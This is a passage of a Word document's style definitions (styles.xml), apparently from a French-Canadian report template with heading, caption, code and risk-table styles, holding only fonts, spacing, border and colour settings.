    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="2FBCE143"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsiaTheme="minorEastAsia"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:smallCaps w:val="1"/>
      <w:color w:val="auto"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:val="fr-CA"/>
    </w:rPr>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="595959" w:sz="24" w:space="1"/>
      </w:pBdr>
      <w:spacing w:before="320" w:after="480" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D32753"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="595959" w:sz="12" w:space="1"/>
      </w:pBdr>
      <w:spacing w:before="480" w:after="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="140"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:left="720" w:hanging="360"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="220" w:after="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="40"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>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Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char" w:customStyle="true">
    <w:uiPriority w:val="9"/>
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="2FBCE143"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsiaTheme="minorEastAsia"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:smallCaps w:val="1"/>
      <w:color w:val="auto"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:val="fr-CA" w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="true">
    <w:uiPriority w:val="9"/>
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="2FBCE143"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsiaTheme="minorEastAsia"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:smallCaps w:val="1"/>
      <w:color w:val="auto"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w:lang w:val="fr-CA" w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HeaderChar" w:customStyle="1">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D32753"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-CA" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FooterChar" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D32753"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-CA" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D32753"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:smallCaps/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="fr-CA" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitreGardeCar" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="TitreGarde Car"/>
    <w:basedOn w:val="Heading1Char"/>
    <w:link w:val="TitreGarde"/>
    <w:rsid w:val="2FBCE143"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Yu Mincho"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CaptionChar" w:customStyle="1">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Caption"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D32753"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="16"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="fr-CA" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CodeChar" w:customStyle="1">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:qFormat/>
    <w:rsid w:val="00582F32"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
      <w:lang w:val="fr-CA" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TableTextCar" w:customStyle="1">
    <w:name w:val="Table Text Car"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="TableText"/>
    <w:qFormat/>
    <w:rsid w:val="007F6E75"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:eastAsia="Calibri" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IndexLink" w:customStyle="1">
    <w:name w:val="Index Link"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading" w:customStyle="1">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Noto Sans CJK SC" w:cs="FreeSans"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="140"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="BodyText"/>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CaptionChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index" w:customStyle="1">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HeaderandFooter" w:customStyle="1">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="440"/>
        <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TitreGarde" w:customStyle="1">
    <w:name w:val="TitreGarde"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitreGardeCar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="595959" w:sz="24" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Code" w:customStyle="1">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="000000" w:sz="4" w:space="1"/>
        <w:left w:val="single" w:color="000000" w:sz="4" w:space="4"/>
        <w:bottom w:val="single" w:color="000000" w:sz="4" w:space="1"/>
        <w:right w:val="single" w:color="000000" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableText" w:customStyle="1">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TableTextCar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:eastAsia="Calibri" w:cs="Microsoft Sans Serif"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Index"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9977"/>
      </w:tabs>
      <w:ind w:left="567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00D32753"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:bidi="en-US"/>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Tab-RisqueHaut" w:customStyle="1">
    <w:name w:val="Tab - Risque Haut"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D32753"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:bidi="en-US"/>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tcPr>
      <w:tcMar>
        <w:top w:w="57" w:type="dxa"/>
        <w:left w:w="142" w:type="dxa"/>
        <w:bottom w:w="57" w:type="dxa"/>
        <w:right w:w="142" w:type="dxa"/>
      </w:tcMar>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        <w:b/>
        <w:caps w:val="0"/>
        <w:smallCaps/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
        <w:tcMar>
          <w:top w:w="57" w:type="dxa"/>
          <w:left w:w="142" w:type="dxa"/>
          <w:bottom w:w="57" w:type="dxa"/>
          <w:right w:w="142" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:caps w:val="0"/>
        <w:smallCaps/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="666666"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a0" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a1" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a2" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a3" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a4" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a7" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="57" w:type="dxa"/>
        <w:left w:w="142" w:type="dxa"/>
        <w:bottom w:w="57" w:type="dxa"/>
        <w:right w:w="142" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:smallCaps/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="000000" w:sz="4" w:space="0"/>
          <w:insideH w:val="single" w:color="000000" w:sz="4" w:space="0"/>
          <w:insideV w:val="single" w:color="000000" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
        <w:tcMar>
          <w:top w:w="57" w:type="dxa"/>
          <w:left w:w="142" w:type="dxa"/>
          <w:bottom w:w="57" w:type="dxa"/>
          <w:right w:w="142" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:smallCaps/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="a8" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>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rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentTextChar" w:customStyle="1">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:before="200"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
